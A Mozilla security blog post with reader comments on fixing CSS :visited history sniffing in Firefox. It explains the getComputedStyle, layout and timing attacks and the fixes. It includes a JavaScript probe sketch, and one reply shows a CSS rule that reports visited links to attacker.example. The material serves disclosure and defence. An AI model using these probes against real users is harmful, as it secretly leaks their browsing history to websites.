Plugging the CSS History Leak

Privacy isn’t always easy.

We’re close to landing some changes in the Firefox development tree that will fix a privacy leak that browsers have been struggling with for some time. We’re really excited about this fix, and we hope other browsers will follow suit. It’s a tough problem to fix, though, so I’d like to describe how we ended up with this approach.

History Sniffing

[Image: visited and unvisited links]

Links can look different on web sites based on whether or not you’ve visited the page they reference. You’ve probably seen this before: in some cases, visited links are purple instead of blue. This is just one of the many features web designers use to make the web the best it can be, and for the most part that’s a good thing.

The problem is that this difference in appearance can be detected by the page showing you the links, cluing the page in to which of the referenced pages you’ve been to. The result: not only can you see where you’ve been, but so can the web site!

Originally specified as a useful feature for the Web, visited link styling has been part of the web for… well, forever. So this is a pretty old problem, and resurfaces every once in a while to generate more paranoid netizens.

The most obvious fix is to disable different styles for visited versus unvisited links, but this would come at the expense of utility: while sites can no longer figure out which links you’ve clicked, neither can you. David Baron has implemented a way to help keep users’ data private while minimizing the effect on the web, and we are deploying it to protect our users. We think this represents the best solution to the problem, and we’ll be delighted if other browsers approach this the same way.

Technical Details

The biggest threats here are the high-bandwidth techniques, or those that extract lots of information from users’ browsers quickly. These are particularly worrisome since they enable not only very focused attacks, but also the widespread brute-force attacks that are, in general, more useful to a variety of attackers (potentially including fingerprinting).

The JavaScript function getComputedStyle() and its related functions are fast and can be used to guess visitedness at hundreds of thousands of links per minute. To make it harder for web sites to figure out where you’ve been without radically changing the web, we’re changing the way we style links in three fairly subtle ways:
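As a concrete sketch of this attack class: an attacker styles :visited links a distinctive color, inserts a link element for each URL to test, and reads the computed color back. The helper below is illustrative (not any particular attacker’s code) and separates the DOM lookup from the classification logic:

```javascript
// Sketch of a getComputedStyle()-based history probe. lookupColor is
// injected: in a real page it would create an <a href=url>, attach it to
// the document, and read getComputedStyle(a).color.
function classifyLinks(urls, lookupColor, visitedColor) {
  const visited = [];
  for (const url of urls) {
    // A URL whose rendered color matches the :visited rule was in history.
    if (lookupColor(url) === visitedColor) {
      visited.push(url);
    }
  }
  return visited;
}
```

In a browser, the lookup would be roughly: create an anchor, set its href, append it, read `getComputedStyle(a).color`, and remove it. It is exactly this read-back that Change 3 below defeats.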

Change 1: Layout-Based Attacks
First of all, we’re limiting what types of styling can be done to visited links to differentiate them from unvisited links. Visited links can only be different in color: foreground, background, outline, border, SVG stroke and fill colors. All other style changes either leak the visitedness of the link by loading a resource or changing position or size of the styled content in the document, which can be detected and used to identify visited links.
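As a concrete illustration of the new rules, consider a stylesheet like the following (selectors and values are made up for this example):

```css
/* Still honored for :visited - color-only differences: */
a:visited {
  color: purple;              /* foreground color: allowed */
  background-color: #f8f0ff;  /* background color: allowed */
}

/* Effectively ignored for :visited after the change, because each of
   these would leak history via layout changes or a network request: */
a:visited {
  font-weight: bold;                  /* changes size/position */
  display: none;                      /* changes layout */
  background-image: url("seen.png");  /* triggers a resource load */
}
```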

While we are changing what is allowed in CSS, the CSS 2.1 specification already takes into consideration how visited links can be abused:

“UAs may therefore treat all links as unvisited links, or implement other measures to preserve the user’s privacy while rendering visited and unvisited links differently.” [CSS 2 Specification]

Change 2: Some Timing Attacks
Next, we are changing some of the guts of our layout engine to provide a fairly uniform flow of execution that minimizes differences in layout time for visited and unvisited links. The changes cause styles to be resolved on all links for both the visited and unvisited states and stored; then, when the link is styled, the appropriate set of styles is chosen, making the code paths for visited and unvisited links essentially the same length. This should eliminate some of the easy-to-mount timing attacks.
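The approach can be sketched in JavaScript like this (the real change lives in Gecko’s C++ style system; the names and shapes here are purely illustrative):

```javascript
// Sketch of the "resolve both, then choose" mitigation: both style sets
// are always computed, so the amount of work done does not depend on
// whether the link is visited.
function styleLink(isVisited, rules) {
  const unvisitedStyle = { ...rules.link };
  const visitedStyle = { ...rules.link, ...rules.visited };
  // Only at the very end is one of the two pre-computed sets selected,
  // keeping the code paths essentially the same length.
  return isVisited ? visitedStyle : unvisitedStyle;
}
```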

Change 3: Computed Style Attacks
JavaScript is not going to have access to the same style data it used to have. When a web page tries to get the computed style of a link (or any of its sub-elements), Firefox will give it unvisited style values.

What does this mean for users?

For the most part, users shouldn’t notice a change in how the web works. A few web sites may look a little different, but visited links will still show up differently colored. A few sites that use more than color to differentiate visited links may look slightly broken at first while they adjust to these changes, but we think it’s the right trade-off to be sure we protect our users’ privacy. This is a troubling and well-understood attack; as much as we hate to break any portion of the web, we need to shut the attack down to the extent we can.

We have to be realistic, though: there are many ways all browsers leak information about you, and fixing CSS history sniffing will not block all of these leaks. But we believe it’s important to stop the scariest, most effective history attacks any way we can since it will be a big win for users’ privacy.

If the remaining attacks worry you, or you can’t wait for us to ship this fix, Firefox 3.5 and newer versions already allow you to disable all visited styling (which immediately stops this attack) by setting the layout.css.visited_links_enabled option in about:config to false. While this will plug the history leak, you’ll no longer see any visited styling anywhere.
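If you prefer to preconfigure this rather than flip it by hand, the same preference can be set from a profile’s user.js file (a sketch; only the preference name comes from this post):

```js
// In <profile directory>/user.js - disables all :visited styling in
// Firefox 3.5+, closing the leak at the cost of visited-link colors.
user_pref("layout.css.visited_links_enabled", false);
```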

Enhancing Privacy on the Web

We want to bridge the gap between our users’ expectations of privacy and what actually happens on the web. Sometimes users have an expectation that we preserve their privacy a certain way, and if we can, we want to live up to it. Privacy isn’t a feature that can simply be added to a browser, though; it often comes at the expense of utility. We think we’ve found a fix that will balance flexibility for web developers while providing a safer experience for our users on the web.

Sid Stamm, Mozilla Security

67 responses

  1. Dood wrote on :

    This sounds to me like a hard-to-implement, hard-to-maintain and quite unreliable solution. I am quite confident, though, it won’t break anything important…
    Still, can somebody please summarise for me the arguments against the SafeHistory approach?
    (I guess you discussed this not only in the Bugzilla entry but also on IRC and etc.)

  2. mogya wrote on :

    Why don’t you treat such sites as “bad sites” in the Malware Protection?
    The sites using “the CSS History Leak” are malicious sites, aren’t they?

  3. Kulmegil wrote on :

    Soo… will the new hack completely block the possibility of determining visited links? – not only by getting a node and its children’s “computedstyle”, but also by getting it indirectly from the PARENT node (by checking its computed height, for example)?

  4. Sai Emrys wrote on :

    Could you please fix the link for my results page from my blog repost to http://cssfingerprint.com/results (the original page)?

    Thanks.

    1. Sid Stamm wrote on :

      @Sai Emrys: Of course! Thanks for the link.

  5. Sai Emrys wrote on :

    @Adam My attack (which Sid kindly linked to) is AFAIK the fastest one currently out there. My current throughput using reliable methods is (local to the browser):
    Chrome: .04 ms/URL, 1,500,000 URL/min
    Explorer: .26 ms/URL, 227,000 URL/min
    Firefox: .10 ms/URL, 553,000 URL/min
    Opera: .09 ms/URL, 640,000 URL/min
    Safari: .02 ms/URL, 3,690,000 URL/min

    IOW, it’s quite a lot faster than the fastest you thought.

    There are some other issues that are preventing me from actually doing that much throughput end-to-end; a typical scraping run tests ~80-100k URLs 4x each (on my dev box I’ve gotten up to ~250*4k). But that’s just a temporary hurdle. The severity of this hole is quite significant.

    My code is entirely open source, so if you want to know how the scraping part works, just look at http://github.com/saizai/cssfingerprint/blob/master/public/javascripts/history_scrape.js

    Feel free to visit http://cssfingerprint.com if you’d like to see the effects.

    FWIW, I think that DBaron’s approach is fairly solid. I don’t think that there is anything that can be done short of what he’s doing in terms of breaking expectations of usage, while still fixing the bug. As the post says, it’s an unavoidable trade-off.

    Of course, I’ll also be one of the first to try to break his code, just in case I’m wrong about that. 😉

  6. Otávio wrote on :

    I agree with “36 – Eris”, and think there’s something even better: why not just hide the href attribute of the A tag if it’s from another domain, and show about:blank or anything like that?

  7. Dhouwn wrote on :

    BTW: What about subpixel positioning, is there a chance that a different link colour might interact with this?

  8. Ferenc Veres wrote on :

    What about background-position?

    Can’t we keep that, so using “CSS Sprites” for checkmarks and other visual – also color blind friendly – styles would be possible? One could use that to stroke visited PDF links I think, as requested in a comment above. Does it change anything detectable?

    Now that we know COLOR will stay, could you set a better visible link color for this blog and another (different) color for visited links? Thanks.

  9. Edward Jones wrote on :

    I don’t understand how Michael (comment 23) can say that minus the coloring of links a browser becomes completely useless. While I do sympathize with his condition which I’m sure presents many challenges in life, a web page does not suddenly stop working if you can’t differentiate between visited and non-visited links. I am confident that he would still be able to use any browser even if no difference in the styling of visited vs. non-visited links was presented. I am the first person to stand up for accessibility and design my websites to be usable by those with screen readers for example. I think the absolutism of his comment does a disservice to the accessibility movement.

  10. Adam Messinger wrote on :

    For all of those asking about allowing broader :visited link styles for links within the same domain — this will still have privacy implications on sites like LiveJournal and WordPress.com. Many users share the same domain on those sites, and it would be possible for one LJ user (for example) to determine all the other LJs a visitor had viewed.

    Though I understand the need to fix this privacy problem, I’m among those who are less than thrilled at the constraints being imposed on front-end designers and developers. Hopefully a less limiting solution will be found at some point in the future.

  11. Chris wrote on :

    Why is this even a privacy issue? It’s not like someone is going to have some gossip site that lists the sites that certain IP addresses visit.

    The only people I can think of that would maybe have a rational reason to be concerned about the web surfing privacy of their IP address are people who are doing something illegal online such as going to websites to get child pornography or something. But why would we want to protect them anyways?

    This is just as stupid as people thinking their privacy is being violated when their DNA is on file after an arrest when they’re found not guilty.

    In both cases there would be no harm done for people that deserve no harm.

  12. Justen wrote on :

    I have mixed feelings about this. Privacy is a personal responsibility; giving people the tools to enhance their privacy is one thing, but using hamhanded techniques like this is unlikely to help very much and may cause headaches for designers and developers who legitimately use the features you’re about to axe. If you really want people to have better privacy, just give them better user interface tools to protect it. You could do things like provide a button in the main UI to block the presently visited site from appearing in history, another to block the present site from accessing history information, and another to clear all history. Give them more granular control of what kinds of things get saved to history and for how long via an intuitive control panel.

  13. Daniel Veditz wrote on :

    @Chris

    The main demo sites know nothing about “you”, so maybe the fact that they know where “you” visit is merely interesting. But sites that already know more specific things about you (because you have an account with them, for instance) can now correlate all sorts of things with a more specific notion of “you”.

    This does far more than catch people doing illegal things, criminals are not the only ones with “something to hide”. Examples:

    A hacker can use this to figure out which online bank you actually use and present a more believable phishing attack.

    Online stores could show you higher prices if they notice you visit high-end online stores and cheaper prices if you visit walmart.com (Amazon, among others, has at least experimented with showing different prices to different users, though their technique is unknown and probably isn’t using CSS history).

    A military site (where you’re required to authenticate) might find out you’re gay and ruin your career even though you’ve been careful not to “tell”.

    A blog might show only the sharing icons (digg, reddit, facebook, etc) for the services you use rather than a dozen or two confusing little icons (this one might actually be positive).

    Web ads could be better targeted at your demographic (possibly good or creepy).

    Criminal groups with websites/discussion groups could use this to “out” undercover cops or informants.

  14. Chris wrote on :

    @ Daniel Veditz

    Good points. I feel stupid not thinking about sites that you signed up for.

    The hacker scenario would be a security problem, caused by a privacy issue. A good point.

    The online stores showing higher prices to certain people and the undercover cop issues are also very good points.

    I can think of other negative situations that could arise from this privacy issue now as well.

    I should have thought on it longer. Thanks for setting me straight 🙂

  15. Bruce wrote on :

    Like everyone else, I really hope that Mozilla developers and other browser developers will only limit styling on visited external links.

  16. Mitchell Evan wrote on :

    Ditto @Matthew. Make the security improvement the default, but allow users to override it by browser configuration. This will go a long way to addressing the accessibility issue.

    Ditto the many requests to make the changes apply only to links to external sites. But we probably want to define external as “untrusted” instead of “other domain”, in order to support a browser’s list of trusted sites e.g. corporate configuration of trusted intranet sites.

  17. bpjonsson wrote on :

    I just want to point out that if color is the only means available to differentiate visited links from unvisited ones, then the best remaining way to be nice to people with color vision problems is the one which was always most effective:

    Use high text/background contrast and let :visited be inverse video relative to :link.

    This is not much used even now, in spite of being the most effective; no doubt because inverse video is dead ugly and jumps out of the page/screen, and probably not only because we’re unused to it.

    Since I’ve got (non color) vision problems myself I’ve thought a lot about the issue of differentiating (un)visited links from each other clearly without depending on color, and without having to sacrifice the traditional uses of font properties for emphasis. Whatever preferences I had are out now!

    If color is the only remaining way of differentiating links from non-links at all we’re really in trouble…

  18. izdelava strani wrote on :

    I really hope that you’ll do the job and even more that the rest will follow. ’Cos as a website developer I’m fed up with all the browsers that need to be satisfied so that the web site looks good in all of them.

  19. Pat wrote on :

    Pat from AddToAny. We’ve deployed this technique on our sharing widget for years (search for “addtoany smart menu”) so this does indeed affect us and over 100,000 publishers. Personally, I’m okay with plugging this hole to a certain degree, but the aforementioned seems like a silver-bullet approach with too many developer implications.

    AddToAny’s script, for instance, queries against URLs from 200 sharing/bookmarking services to place visited services at the top of the sharing menu. It’s a marvelous use-case, I might add. 😉 200 queries is not “high-bandwidth” as defined above, but it’s noteworthy. Just FYI, the results are used at runtime, client-side only.

    My thoughts:

    Have we discussed defining a ceiling for high-bandwidth queries? A maximum number of queries doesn’t cover all privacy implications of this hack, but it would plug the more infamous and nefarious attacks. AddToAny would certainly favor this approach.

    Adopting a same-origin policy on this issue definitely makes sense to me. @Adam Messinger re: your wordpress.com example: That’s why wordpress.com does not (and probably never will) allow arbitrary JavaScript from publishers. Not sure about LiveJournal, but most sites of this nature don’t permit arbitrary JavaScript due to a slew of issues extending beyond this one.

    Regardless of outcome, this surely is an exciting development and we’ll be monitoring the conversation here and at bugzilla. Please ping me if I miss anything or if you’d like to chat directly. Twitter @micropat or pat at addtoany. Cheers!

  20. Bruce wrote on :

    Can’t Mozilla simply disable the ability of javascript to determine all the styles on visited links instead of disallowing those styles?

    1. Sid Stamm wrote on :

      @Bruce: if we just disabled access via JS, that wouldn’t solve any of the timing attacks or the non-JS CSS-based attacks (those that rearrange the DOM, resize things, or create requests for images). For example, take a look at http://browser-recon.info. The fact that there are so many ways to access the history, with and without JS, makes it necessary to address the capabilities and not just the information presented to JS.
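      For readers wondering what a non-JS, CSS-based attack looks like, a minimal sketch is a :visited rule that triggers a network request (the id and URL below are purely illustrative):

      ```css
      /* If this link has been visited, the browser applies the :visited
         rule and fetches the background image, so the attacker's server
         learns the answer from its access logs - no JavaScript required.
         This is one of the resource-loading channels Change 1 closes. */
      a#probe:visited {
        background: url("https://attacker.example/log?checked=bank.example");
      }
      ```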
